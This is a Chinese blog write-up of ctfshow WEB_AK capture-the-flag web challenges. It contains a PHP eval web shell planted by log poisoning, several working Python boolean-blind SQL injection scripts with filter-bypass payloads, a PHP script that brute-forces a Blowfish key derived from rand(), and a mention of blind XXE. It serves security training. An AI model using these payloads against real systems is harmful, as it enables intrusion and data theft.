【原创】ctfshow—WEB_AK赛

签到_观己

过滤了php意思就无法使用文件包含

[huayang]查看日志文件/var/log/nginx/access.log

有ua显示可以使用一句话

<?php @eval($_POST[shell]);?>

蚁剑连接即可在根目录下看见flag

web1_观字

只需把.换成。即可

web2_观星

一看就知道是布尔盲注

记得web1-14有类似的题

查一下过滤

顺便再贴一个fuzz https://github.com/fuzzdb-project/fuzzdb

建议自己写

去扒羽师傅的(●’◡’●)

  • 逗号过滤,采用substr((database())from({})for(1))的形式
  • 等号和like过滤,用regxep或者in绕过
  • ascii用ord代替
  • 单引号用16进制绕过
  • 过滤了空格可以用括号代替
#author  羽
import requests
url="http://733ff90c-f8ab-4a3b-af6e-3ebb2f4a7b12.chall.ctf.show/index.php?id=1^"
flag=""
for i in range(1,50):
    print("i="+str(i))
    for j in range(38,126):
        #u="case(ord(substr(database()from({0})for(1))))when({1})then(2)else(3)end".format(i,j)  #库名  web1
        #u="case(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)regexp(database()))from({0})for(1))))when({1})then(2)else(3)end".format(i,j) #表名 flag、page、user
        #u="case(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name)regexp(0x666c6167))from({0})for(1))))when({1})then(2)else(3)end".format(i,j) #列名 FLAG_COLUMN、flag
        u="case(ord(substr((select(group_concat(flag))from(flag))from({0})for(1))))when({1})then(2)else(3)end".format(i,j) #flag字段
        u=url+u
        r=requests.get(u)
        t=r.text
        if("I asked nothing" in t):
            flag+=chr(j)
            print(flag)
            break

我简单的改了一下哈哈

import requests
url="http://305d6aed-86db-41a3-b428-8831ce41b54b.chall.ctf.show/index.php?id=1^"
true = 'Languor was'
name = ''
for number1 in range(1,50):
    for number2 in range(38,126):
        # urls="case(ord(substr(database()from(%d)for(1))))when(%d)then(2)else(3)end" % (number1,number2)  #库名  web1
        # urls = "case(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)regexp(database()))from(%d)for(1))))when(%d)then(2)else(3)end" % (number1,number2) #表名 flag、page、user
        # urls = "case(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name)regexp(0x666c6167))from(%d)for(1))))when(%d)then(2)else(3)end" % (number1,number2) #列名 FLAG_COLUMN、flag
        urls = "case(ord(substr((select(group_concat(flag))from(flag))from(%d)for(1))))when(%d)then(2)else(3)end" % (number1,number2) #flag字段
        urls = url + urls
        response = requests.get(urls)
        if true in response.text:
            name += chr(number2)
            print(name)
            break

2020.10.20 —— 11:42 A.M. 更

换个思路

自己又用另一种方法写了一个以便拓展思路

import requests
url="http://8f65f4ee-c785-40f6-bbad-c2c4890e4850.chall.ctf.show/index.php?id=1^"
true = "all about you"
name = ''
for number1 in range(1,50):
    for number2 in range(44,126):
        #urls = "(ord(substr(database()/**/from/**/%d/**/for/**/1))>%d)" % (number1,number2)
        #urls = "(ord(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema/**/in(database()))/**/from/**/%d/**/for/**/1))>%d)^0" % (number1,number2)
        #urls = "(ord(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name/**/in(0x666c6167))from/**/%d/**/for/**/1/**/))>%d)^0" % (number1,number2)
        urls = "(ord(substr((select(flag)from(flag))from/**/%d/**/for/**/1))>(%d))" % (number1,number2)
        urls = url + urls
        response = requests.get(urls)
        if true in response.text:
            name += chr(number2)
            print(name)
            break

web3_观图

就很草

给出了一个地址。看似是base64实则不是

访问showImage.php

使用了这种加密方式

师傅们说是des

可des的加密写法是des-ecb

这个bf-ecb我实在没查到望师傅留言给予解答

其中openssl_decrypt()为解密
openssl_encrypt()为加密

目标已经很明显了

而PHP rand()函数产生的数值的范围最大为32768,我们可以编写爆破脚本

然后再进行加密访问即可

<?php
for($i=0;$i<32768;$i++){
    $key = substr(md5('ctfshow'.$i),3,8);
    $image="Z6Ilu83MIDw=";
    $str = openssl_decrypt($image, 'bf-ecb', $key);
    if(strpos($str,"gif") or strpos($str,"jpg") or strpos($str,"png")){
        print($i);
        break;
    }
}
$key = substr(md5('ctfshow' . $i), 3, 8);
$image = "config.php";
$str = openssl_encrypt($image, 'bf-ecb', $key);
echo urlencode($str);
?>

保存查看即可

web4_观心

点击占扑会看见一个api

仔细看会和明显的看见一个xml文件

不出意外就是xxe漏洞

因为是Blind OOB XXE

难度有点大推荐师傅们的文章

https://www.freebuf.com/articles/web/177979.html

https://blog.csdn.net/miuzzx/article/details/107706685

https://www.cnblogs.com/anweilx/p/13417899.html#web4_%E8%A7%82%E5%BF%83

http://www.manongjc.com/detail/19-mqrlpvrfmyquahz.html

https://www.cnblogs.com/Cl0ud/p/13549041.html

[/huayang]

==>转载请注明来源哦<==

评论

  1. 华扬
    华扬 博主
    11月前
    2021-3-03 9:57:03

    康康

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇